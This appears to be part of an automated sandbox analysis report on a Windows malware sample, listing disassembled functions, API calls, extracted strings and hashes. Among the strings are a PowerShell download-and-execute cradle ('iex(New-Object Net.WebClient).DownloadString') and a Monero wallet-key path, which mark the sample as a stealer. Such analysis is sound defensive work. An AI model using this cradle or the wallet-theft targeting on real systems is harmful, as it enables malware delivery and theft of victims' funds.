                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: c9a9c4155b502524fbc0b24a0830c408ccc7e41128f1e894f60e22a22e3fa666
                              • Instruction ID: 1d7bd9ff35c14b460f104a9534dceecd83ce1562c3534c8a930a0fa3e7dd04cb
                              • Opcode Fuzzy Hash: c9a9c4155b502524fbc0b24a0830c408ccc7e41128f1e894f60e22a22e3fa666
                              • Instruction Fuzzy Hash: 0241BB71E10209DAEB16FBA1D894FDDBB74BF24300F404119E196AB1D4EF746A8ACF90
                              Function 00FF9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FF9F41
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 99027b8347121964df0b738efc0ec919e06e142acd803f8f7e70fe13d509ed0f
                              • Instruction ID: 14ed3f2d4a9ee333a7f452083565ebebbbbc5ba6ab5f5d3b47ad784d821f02cc
                              • Opcode Fuzzy Hash: 99027b8347121964df0b738efc0ec919e06e142acd803f8f7e70fe13d509ed0f
                              • Instruction Fuzzy Hash: 6F615B71A0020CEBDB24EFA4DC95FED7775BF54300F448118EA4A9F294EB746A0ACB91
                              Function 010040B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0198E1D0,00000000,00020119,?), ref: 010040F4
                              • RegQueryValueExA.ADVAPI32(?,0198F2C8,00000000,00000000,00000000,000000FF), ref: 01004118
                              • RegCloseKey.ADVAPI32(?), ref: 01004122
                              • lstrcat.KERNEL32(?,00000000), ref: 01004147
                              • lstrcat.KERNEL32(?,0198F1A8), ref: 0100415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: 0168c4cbbd2b598621f756826369015eb2595674d140aefb16c51c04429ad272
                              • Instruction ID: 400fc4070f039bd047150ac5e43d82d097f4e0ad7b8bdcf8bb9a531195f6069c
                              • Opcode Fuzzy Hash: 0168c4cbbd2b598621f756826369015eb2595674d140aefb16c51c04429ad272
                              • Instruction Fuzzy Hash: 5941DAB6D00108ABDB25EBA0EC4AFFE733DBB58300F444558A755971C4EA759A888B91
                              Function 01007E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01007E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0197BD18,00000000,00020119,?), ref: 01007E5E
                              • RegQueryValueExA.ADVAPI32(?,0198E310,00000000,00000000,000000FF,000000FF), ref: 01007E7F
                              • RegCloseKey.ADVAPI32(?), ref: 01007E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: be147b651a0c8d8e0ae6e95019cea01fe44f0410b2ade58a8a9a055754b1bccd
                              • Instruction ID: 38fd17ae31c0f18bc1d8067f6d70a465f4777a0231e80e58d295f744af88db57
                              • Opcode Fuzzy Hash: be147b651a0c8d8e0ae6e95019cea01fe44f0410b2ade58a8a9a055754b1bccd
                              • Instruction Fuzzy Hash: A7114FB1A44205EBD715CB94E949F7FBBB8FB08B10F104129F685E7284D7786C008BA1
                              Function 01009260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(0198F1F0,?,?,?,0100140C,?,0198F1F0,00000000), ref: 0100926C
                              • lstrcpyn.KERNEL32(0123AB88,0198F1F0,0198F1F0,?,0100140C,?,0198F1F0), ref: 01009290
                              • lstrlen.KERNEL32(?,?,0100140C,?,0198F1F0), ref: 010092A7
                              • wsprintfA.USER32 ref: 010092C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: d736083cc2929b8d3997a0fced9ad71d8de03c0faa37af066eb8e8430ec24c1b
                              • Instruction ID: 295e3cb78fbe6fdde7e77dcfea80766dc9e08f1324bbdd452ee14ad8fb1da00f
                              • Opcode Fuzzy Hash: d736083cc2929b8d3997a0fced9ad71d8de03c0faa37af066eb8e8430ec24c1b
                              • Instruction Fuzzy Hash: 97011E75500108FFCB08DFECD988EAE7BB9FB54354F108558F949CB205D631AA40DB90
                              Function 00FF12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FF12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FF12F5
                              • RegCloseKey.ADVAPI32(?), ref: 00FF12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 279702c5a869dfede165dd22f337ea83b3cfb66e8d34669176103ce21cac9227
                              • Instruction ID: baacaabbfe47eedd9115ecd053a5a2d9ce8f89a1dbcfaccaee25031b00960007
                              • Opcode Fuzzy Hash: 279702c5a869dfede165dd22f337ea83b3cfb66e8d34669176103ce21cac9227
                              • Instruction Fuzzy Hash: 6701E1B9A40208BBDB14DFE4E88DFAEB7B8FB48701F108169FA45D7284D6759A058F50
                              Function 0100C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 2968fdb0571972fe161cf2eb03904d9359b2a645edfa66520c10888da3eda4b3
                              • Instruction ID: 1b2e3c2d7a24f649c3fbfcab03403f3252555603dfe5227889ac54f31c4188a2
                              • Opcode Fuzzy Hash: 2968fdb0571972fe161cf2eb03904d9359b2a645edfa66520c10888da3eda4b3
                              • Instruction Fuzzy Hash: C141C87150479C5EFB238B688D88FFB7BE89B45704F1445E8DACA861C2D2719B448F64
                              Function 01006630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 01006663
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 01006726
                              • ExitProcess.KERNEL32 ref: 01006755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: a2b9a96e5a30c39a9f75a70a9664bc182ee3a36aca1812eeff3156684437db6d
                              • Instruction ID: f6c07032da0fd8bb4c925e5ea9fc7b30513cd486b9c7208ed322b16b75aafaec
                              • Opcode Fuzzy Hash: a2b9a96e5a30c39a9f75a70a9664bc182ee3a36aca1812eeff3156684437db6d
                              • Instruction Fuzzy Hash: AE312BB1D01218AAEB15EB90EC94FDEB778AF64300F404199E34AA71C0DF746B48CF65
                              Function 010087C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01010E28,00000000,?), ref: 0100882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01008836
                              • wsprintfA.USER32 ref: 01008850
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: e7cebde52343417ca671fb558efc7f753a0619efc322b403f634781bb052e2e9
                              • Instruction ID: 88b4f9c60c6cbebdb817d179c064616879cc91bf6a42e3071f6ff05fa4cec626
                              • Opcode Fuzzy Hash: e7cebde52343417ca671fb558efc7f753a0619efc322b403f634781bb052e2e9
                              • Instruction Fuzzy Hash: 4C21FEB1A40204AFDB14DF94ED49FAEBBB8FB48711F104119F646E7284C77999018BA0
                              Function 01008D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0100951E,00000000), ref: 01008D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01008D62
                              • wsprintfW.USER32 ref: 01008D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 0048ef5781aebda0162bb368ab4bd71d618091403b7029c3affba49f2d83c483
                              • Instruction ID: 042bcf8de4d2a0b737501dbc6d17d02749042b964ea0ddb17279f7141353e752
                              • Opcode Fuzzy Hash: 0048ef5781aebda0162bb368ab4bd71d618091403b7029c3affba49f2d83c483
                              • Instruction Fuzzy Hash: F4E08CB0A40208FBD720DB94E80EE6DB7B8EB04702F0000A8FD8AC7244DA719E008B91
                              Function 00FFA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FFA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00FFA3FF
                              • lstrlen.KERNEL32(00000000), ref: 00FFA6BC
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00FFA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: c3f120e64358bdb5db9c54d0769fa54c40a35c271bd8669baa1418003fba49d8
